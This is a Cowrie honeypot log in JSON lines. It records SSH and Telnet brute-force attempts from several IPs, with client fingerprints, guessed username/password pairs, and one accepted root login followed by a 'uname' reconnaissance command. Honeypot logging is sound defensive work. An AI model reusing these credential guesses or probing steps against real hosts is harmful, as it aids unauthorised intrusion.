{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:12.241270Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:12.242444Z","src_ip":"41.226.27.251","session":"073fcc056122"}
{"eventid":"cowrie.session.closed","duration":12.903082370758057,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:15.023499Z","src_ip":"212.227.125.160","session":"d06c635db540"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33769,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a81af0ac57b","protocol":"telnet","message":"New connection: 212.227.125.160:33769 (1.2.3.4:23) [session: 1a81af0ac57b]","sensor":"my-vps","timestamp":"2025-08-31T02:17:15.139188Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49554,"dst_ip":"1.2.3.4","dst_port":22,"session":"c67cdf2f2ca3","protocol":"ssh","message":"New connection: 212.227.125.160:49554 (1.2.3.4:22) [session: c67cdf2f2ca3]","sensor":"my-vps","timestamp":"2025-08-31T02:17:20.965829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:21.540765Z","src_ip":"212.227.125.160","session":"c67cdf2f2ca3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:17:21.541781Z","src_ip":"212.227.125.160","session":"c67cdf2f2ca3"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:17:23.639561Z","src_ip":"212.227.125.160","session":"c67cdf2f2ca3"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:25.273258Z","src_ip":"212.227.125.160","session":"c67cdf2f2ca3"}
{"eventid":"cowrie.session.closed","duration":12.754752159118652,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:27.893870Z","src_ip":"212.227.125.160","session":"1a81af0ac57b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38042,"dst_ip":"1.2.3.4","dst_port":22,"session":"2915d1431fd7","protocol":"ssh","message":"New connection: 212.227.125.160:38042 (1.2.3.4:22) [session: 2915d1431fd7]","sensor":"my-vps","timestamp":"2025-08-31T02:17:31.915525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:31.916416Z","src_ip":"212.227.125.160","session":"2915d1431fd7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T02:17:31.958549Z","src_ip":"212.227.125.160","session":"2915d1431fd7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":43056,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ed8d34b0883","protocol":"ssh","message":"New connection: 41.226.27.251:43056 (1.2.3.4:22) [session: 7ed8d34b0883]","sensor":"my-vps","timestamp":"2025-08-31T02:17:32.155811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:32.156805Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:17:32.206127Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:17:32.351912Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:17:32.953700Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:17:32.954391Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:33.004016Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:33.005470Z","src_ip":"41.226.27.251","session":"7ed8d34b0883"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:39.916553Z","src_ip":"212.227.125.160","session":"2915d1431fd7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44164,"dst_ip":"1.2.3.4","dst_port":22,"session":"5974a422fe1a","protocol":"ssh","message":"New connection: 41.226.27.251:44164 (1.2.3.4:22) [session: 5974a422fe1a]","sensor":"my-vps","timestamp":"2025-08-31T02:17:52.346275Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:52.347735Z","src_ip":"41.226.27.251","session":"5974a422fe1a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:17:52.390388Z","src_ip":"41.226.27.251","session":"5974a422fe1a"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-31T02:17:52.519764Z","src_ip":"41.226.27.251","session":"5974a422fe1a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:17:53.865321Z","src_ip":"41.226.27.251","session":"5974a422fe1a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40084,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e447e76f492","protocol":"ssh","message":"New connection: 212.227.235.229:40084 (1.2.3.4:22) [session: 7e447e76f492]","sensor":"my-vps","timestamp":"2025-08-31T02:17:58.886261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:17:59.833625Z","src_ip":"212.227.235.229","session":"7e447e76f492"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:17:59.834532Z","src_ip":"212.227.235.229","session":"7e447e76f492"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"12345","message":"login attempt [elasticsearch/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:18:04.909000Z","src_ip":"212.227.235.229","session":"7e447e76f492"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:06.862757Z","src_ip":"212.227.235.229","session":"7e447e76f492"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44248,"dst_ip":"1.2.3.4","dst_port":22,"session":"e13581687a71","protocol":"ssh","message":"New connection: 41.226.27.251:44248 (1.2.3.4:22) [session: e13581687a71]","sensor":"my-vps","timestamp":"2025-08-31T02:18:12.333230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:18:12.333915Z","src_ip":"41.226.27.251","session":"e13581687a71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:18:12.377715Z","src_ip":"41.226.27.251","session":"e13581687a71"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"123456","message":"login attempt [lighthouse/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:18:12.509694Z","src_ip":"41.226.27.251","session":"e13581687a71"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:13.756246Z","src_ip":"41.226.27.251","session":"e13581687a71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58648,"dst_ip":"1.2.3.4","dst_port":22,"session":"3051654ac0fd","protocol":"ssh","message":"New connection: 212.227.125.160:58648 (1.2.3.4:22) [session: 3051654ac0fd]","sensor":"my-vps","timestamp":"2025-08-31T02:18:20.547660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:18:20.957647Z","src_ip":"212.227.125.160","session":"3051654ac0fd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:18:20.958712Z","src_ip":"212.227.125.160","session":"3051654ac0fd"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"12345","message":"login attempt [elasticsearch/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:18:23.079595Z","src_ip":"212.227.125.160","session":"3051654ac0fd"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:24.592234Z","src_ip":"212.227.125.160","session":"3051654ac0fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55066,"dst_ip":"1.2.3.4","dst_port":23,"session":"00004b0511f2","protocol":"telnet","message":"New connection: 212.227.235.229:55066 (1.2.3.4:23) [session: 00004b0511f2]","sensor":"my-vps","timestamp":"2025-08-31T02:18:28.422948Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56604,"dst_ip":"1.2.3.4","dst_port":22,"session":"68c92546896c","protocol":"ssh","message":"New connection: 41.226.27.251:56604 (1.2.3.4:22) [session: 68c92546896c]","sensor":"my-vps","timestamp":"2025-08-31T02:18:32.604589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:18:32.605999Z","src_ip":"41.226.27.251","session":"68c92546896c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:18:32.649171Z","src_ip":"41.226.27.251","session":"68c92546896c"}
{"eventid":"cowrie.login.failed","username":"flask","password":"12345678","message":"login attempt [flask/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T02:18:32.779131Z","src_ip":"41.226.27.251","session":"68c92546896c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:34.016330Z","src_ip":"41.226.27.251","session":"68c92546896c"}
{"eventid":"cowrie.session.closed","duration":12.50680136680603,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:18:40.929670Z","src_ip":"212.227.235.229","session":"00004b0511f2"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46620,"dst_ip":"1.2.3.4","dst_port":22,"session":"887a8f8f9718","protocol":"ssh","message":"New connection: 41.226.27.251:46620 (1.2.3.4:22) [session: 887a8f8f9718]","sensor":"my-vps","timestamp":"2025-08-31T02:18:52.888211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:18:52.943292Z","src_ip":"41.226.27.251","session":"887a8f8f9718"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:18:52.945777Z","src_ip":"41.226.27.251","session":"887a8f8f9718"}
